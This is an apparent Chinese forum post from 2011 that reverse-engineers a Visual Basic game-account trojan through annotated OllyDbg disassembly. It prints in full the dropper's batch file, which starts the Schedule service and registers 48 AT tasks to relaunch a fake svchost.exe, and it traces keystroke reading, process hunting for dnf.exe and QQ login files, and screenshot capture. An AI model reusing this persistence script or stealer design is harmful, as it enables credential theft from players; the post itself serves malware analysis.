本帖最后由 是昔流芳 于 2011-2-11 12:19 编辑
本篇幅比较长就不自我介绍了。。。大体分 2 部分:第一部分是脱壳后的母体(释放文件、写 bat 建计划任务),第二部分是被释放出来的 Pusmint\svchost.exe(找游戏窗口、读按键、截图上传)。欲知详情,请看下文!
7339EDA9 . 50 push eax ; /pVersionInformation
7339EDAA . 33FF xor edi,edi ; |
7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
7339EDBC . 33C0 xor eax,eax
......
7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service Pack
7339EE2A . 50 push eax
00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
004068B4 52 push edx
004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
004068E7 50 push eax
004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068F3 8BD0 mov edx,eax
004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
00406BAB 50 push eax
00406BAC 68 3C334000 push 脱壳后.0040333C
00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
00406BB7 8BF0 mov esi,eax
00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BBC F7DE neg esi
00406BBE 1BF6 sbb esi,esi
00406BC0 46 inc esi
00406BC1 F7DE neg esi
00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr
733BD096 . 51 push ecx ; /pLocalFileTime
733BD097 . 50 push eax ; |pFileTime
733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
733BD09E . 85C0 test eax,eax
733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
733BD0AE . 52 push edx ; /pSystemTime
733BD0AF . 50 push eax ; |pFileTime
733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime
0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
00410062 33FF xor edi,edi
00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00410067 897D EC mov dword ptr ss:[ebp-14],edi
0041006A 897D DC mov dword ptr ss:[ebp-24],edi
0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator")
00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
00410086 50 push eax
00410087 6A 01 push 1
00410089 6A FF push -1
0041008B 68 20010000 push 120
00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
00410092 57 push edi
00410093 6A 01 push 1
00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
004100A1 50 push eax
004100A2 6A 01 push 1
004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
004100A7 6A 11 push 11
004100A9 51 push ecx
004100AA 6A 01 push 1
004100AC 68 80000000 push 80
004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
004100B3 83C4 1C add esp,1C
004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
004100B9 6A 01 push 1
004100BB 52 push edx
004100BC 68 244A4000 push 脱壳后.00404A24
004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
004100CD 6A 01 push 1
004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
004100D4 50 push eax
004100D5 6A 02 push 2
004100D7 6A FF push -1
004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)
00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
00407288 6A FF push -1
0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
0040729D 51 push ecx
0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少——下面大括号里就是这个 bat 的内容:先把 Schedule 服务设为自动并启动,再用 AT 注册每半小时一条、共 48 条的 /interactive 计划任务来拉起木马(AT 任务通常以 SYSTEM 身份运行,/interactive 使其能访问当前桌面)
004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
004072A9 8BD0 mov edx,eax
004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
004072B4 50 push eax
004072B5 6A 01 push 1
004072B7 6A FF push -1
004072B9 6A 02 push 2
004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
{
sc config Schedule start= AUTO
net start schedule
AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
}
=====================================================================(美丽的分割线哇!哇卡卡!!)
以下是第二部分:被释放到 C:\WINDOWS\system32\Pusmint\ 下的 svchost.exe(注意不是系统自带的 system32\svchost.exe)的分析。
00402F43 00 db 00
00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
00402F49 . 0BC0 or eax,eax
00402F4B . 74 02 je short svchost.00402F4F
00402F4D . FFE0 jmp eax
00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00402F59 . FFD0 call eax
00402F5B . FFE0 jmp eax ; user32.FindWindowA
00402F5D 00 db 00
00402F5E 00 db 00
00403034   A1 20574100 mov eax,dword ptr ds:[415720]
00403039 . 0BC0 or eax,eax
0040303B . 74 02 je short svchost.0040303F
0040303D . FFE0 jmp eax
0040303F > 68 1C304000 push svchost.0040301C ; user32
00403044 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403049 . FFD0 call eax
0040304B . FFE0 jmp eax ; SendMessageA
0040307C   A1 2C574100 mov eax,dword ptr ds:[41572C]
00403081 . 0BC0 or eax,eax
00403083 . 74 02 je short svchost.00403087
00403085 . FFE0 jmp eax
00403087 > 68 64304000 push svchost.00403064 ;
0040308C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403091 . FFD0 call eax
00403093 . FFE0 jmp eax ; RtlMoveMemory
00403114   A1 44574100 mov eax,dword ptr ds:[415744]
00403119 . 0BC0 or eax,eax
0040311B . 74 02 je short svchost.0040311F
0040311D . FFE0 jmp eax
0040311F > 68 FC304000 push svchost.004030FC ;
00403124 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403129 . FFD0 call eax
0040312B . FFE0 jmp eax ; GetForegroundWindow
0040315C   A1 50574100 mov eax,dword ptr ds:[415750]
00403161 . 0BC0 or eax,eax
00403163 . 74 02 je short svchost.00403167
00403165 . FFE0 jmp eax
00403167 > 68 44314000 push svchost.00403144 ; user32
0040316C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403171 . FFD0 call eax
00403173 . FFE0 jmp eax ; GetWindowTextA
0040501F > \68 FC4F4000 push svchost.00404FFC ; GetClassNameA
00405024 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00405029 . FFD0 call eax
0040502B . FFE0 jmp eax ; GetClassNameA
0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
004034A1 . 0BC0 or eax,eax
004034A3 . 74 02 je short svchost.004034A7
004034A5 . FFE0 jmp eax
004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
004034B1 . FFD0 call eax
004034B3 . FFE0 jmp eax
0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
00403451 . 0BC0 or eax,eax
00403453 . 74 02 je short svchost.00403457
00403455 . FFE0 jmp eax
00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403461 . FFD0 call eax
00403463 . FFE0 jmp eax
00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
0040354D . FFD0 call eax
0040354F .- FFE0 jmp eax ; user32.SetWindowLongA
00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
00402EA9 . 0BC0 or eax,eax
00402EAB . 74 02 je short svchost.00402EAF
00402EAD . FFE0 jmp eax
00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId
00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
00402EB9 . FFD0 call eax
00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId
00411639 . 6A 03 push 3 ; /varType = Long
0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
0041163E . 33FF xor edi,edi ; |
00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
00411645 . 50 push eax ; |ArrayVar
00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
0041165E . 51 push ecx
0041165F . 57 push edi
00411660 . 68 10040000 push 410
00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
{
004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
004031A5 . 0BC0 or eax,eax
004031A7 . 74 02 je short svchost.004031AB
004031A9 . FFE0 jmp eax
004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
004031B5 . FFD0 call eax
004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
}
0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>
004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
004116B1 . 50 push eax
004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
004116B8 . 8BD0 mov edx,eax
004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
004116CF . 68 F4010000 push 1F4
004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
004116D7 . 51 push ecx
004116D8 . 52 push edx
004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi
00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
00404B2D . 0BC0 or eax,eax
00404B2F . 74 02 je short svchost.00404B33
00404B31 . FFE0 jmp eax
00404B7F > \68 5C4B4000 push svchost.00404B5C ; EnumProcessModules
00404B84 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
00404B89 . FFD0 call eax
00404B8B . FFE0 jmp eax ; EnumProcessModules
004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy
00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
00403235 . 0BC0 or eax,eax
00403237 . 74 02 je short svchost.0040323B
00403239 . FFE0 jmp eax
0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403245 . FFD0 call eax
00403247 . FFE0 jmp eax
0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C2C2 . 6A 00 push 0
0040C2C4 . 6A FF push -1
0040C2C6 . 6A 01 push 1
0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
0040C2D5 . 50 push eax ; /String8
0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C328 . 6A 00 push 0
0040C32A . 6A FF push -1
0040C32C . 6A 01 push 1
0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
0040C33B . 52 push edx ; /String8
0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
0040C33F . 50 push eax ; |ARG2
0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal
0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]
00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
00404C79 . FFD0 call eax
00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot
00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404CDD . FFD0 call eax
00404CDF . FFE0 jmp eax ; Process32First
00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404D25 . FFD0 call eax
00404D27 .- FFE0 jmp eax ; kernel32.Process32Next
0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
0040C6A1 . 0F84 62240000 je svchost.0040EB09 ; 这里判断是否找到了 dnf.exe(上面 00411290 的返回值存在 [ebp-28],为 0 就跳走)
0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4
004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403505 . FFD0 call eax
00403507 . FFE0 jmp eax
733A03F6 BB B8A63A73 mov ebx,msvbvm60.733AA6B8 ; ThunderRT6Main
733A03FB 50 push eax
733A03FC 53 push ebx
733A03FD FF35 D0064A73 push dword ptr ds:[734A06D0] ; msvbvm60.73390000
733A0403 FF15 F8123973 call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
733A0409 33F6 xor esi,esi
733A040B 85C0 test eax,eax
733A040D 75 71 jnz short msvbvm60.733A0480
733A040F 6A 0C push 0C
733A0411 8D7D CC lea edi,dword ptr ss:[ebp-34]
733A0414 59 pop ecx
733A0415 6A 01 push 1
733A0417 FF35 D4064A73 push dword ptr ds:[734A06D4] ; svchost.00400000
733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
733A1313 . 68 55133A73 push msvbvm60.733A1355
733A1318 . 57 push edi
733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B
004035D0   A1 D4574100 mov eax,dword ptr ds:[4157D4]
004035D5 . 0BC0 or eax,eax
004035D7 . 74 02 je short svchost.004035DB
004035D9 . FFE0 jmp eax
004035DB > 68 B8354000 push svchost.004035B8 ; user32
004035E0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004035E5 . FFD0 call eax
004035E7 . FFE0 jmp eax ; GetWindowTextLengthW
0040364D . 0BC0 or eax,eax
0040364F . 74 02 je short svchost.00403653
00403651 . FFE0 jmp eax
00403653 > 68 30364000 push svchost.00403630 ; user32
00403658 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
0040365D . FFD0 call eax
0040365F . FFE0 jmp eax ; GetKeyState
00403690   A1 EC574100 mov eax,dword ptr ds:[4157EC]
00403695 . 0BC0 or eax,eax
00403697 . 74 02 je short svchost.0040369B
00403699 . FFE0 jmp eax
0040369B > 68 78364000 push svchost.00403678 ; user32
004036A0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004036A5 . FFD0 call eax
004036A7 . FFE0 jmp eax ; MapVirtualKeyA
7340CEF2 |. 56 push esi ; /lParam
7340CEF3 |. FF75 0C push [arg.2] ; |wParam
7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx
004033B0   A1 80574100 mov eax,dword ptr ds:[415780]
004033B5 . 0BC0 or eax,eax
004033B7 . 74 02 je short svchost.004033BB
004033B9 . FFE0 jmp eax
004033BB > 68 98334000 push svchost.00403398 ; user32
004033C0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004033C5 . FFD0 call eax
004033C7 . FFE0 jmp eax ; GetDC
733A1BAF . 57 push edi ; /hDC => NULL
733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
733A1BB6 . 3BC7 cmp eax,edi
733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
733A1BC6 . 50 push eax ; |hDC
733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject
004059AB > \68 88594000 push svchost.00405988 ; GDIPlus
004059B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCall>
004059B5 . FFD0 call eax
004059B7 . FFE0 jmp eax ; GdipSaveImageToFile
0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
0040D52F . 6A 00 push 0
0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
0040D534 . 52 push edx
00411B52 . 68 305C4000 push svchost.00405C30 ; Write
00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
00411B5D . 53 push ebx
00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
00411B69 . 51 push ecx
00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
00411B70 . 52 push edx
00411B71 . FFD7 call edi
00411B73 . 83C4 10 add esp,10
00411B76 . 50 push eax
00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
00411B7D . 50 push eax
00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
00411B84 . 83C4 1C add esp,1C
